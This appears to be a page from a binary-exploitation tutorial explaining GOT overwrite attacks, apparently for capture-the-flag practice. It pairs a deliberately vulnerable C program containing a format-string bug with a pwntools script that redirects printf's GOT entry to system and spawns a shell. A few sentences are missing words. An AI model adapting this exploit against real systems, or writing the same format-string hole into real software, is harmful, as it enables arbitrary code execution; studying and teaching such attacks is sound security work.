GOT Overwrite

stores the actual location in imported libraries ( such as libc ) of functions. Overwriting one of these addresses can allow the attacker to gain control over the program or to execute arbitrary code.

How it works ?

The attacker overwrites a targeted GOT entry, using or for example**,** with the address of an arbitrary function such as system. When the initial function is called, the program will jump to the arbitrary function instead of the intended function.

Code example

#include <stdio.h>

void vuln() {
    char buffer[300];
    
    while(1) {
        fgets(buffer, sizeof(buffer), stdin);

        printf(buffer);
        puts("");
    }
}

int main() {
    vuln();

    return 0;
}

Using format string it's possible to overwrite any GOT entry :

from pwn import *

# Load the ELF file and set it as the binary in the context
elf = context.binary = ELF('./chall')

# Load the libc library and set its base address
# ASLR is assumed to be disabled
libc = ELF('/lib/i386-linux-gnu/libc.so.6')
libc.address = 0xf7dc2000

p = process()

# Create a format string payload that will overwrite the printf
# GOT entry with the address of the system function
payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})

# Send the payload
p.sendline(payload)

# Clean up the process
p.clean()

# Send the command to spawn a shell
p.sendline('/bin/sh')

# Enter interactive mode
p.interactive()

PreviousRet2dlresolve NextRet2LibC

Last updated 2 years ago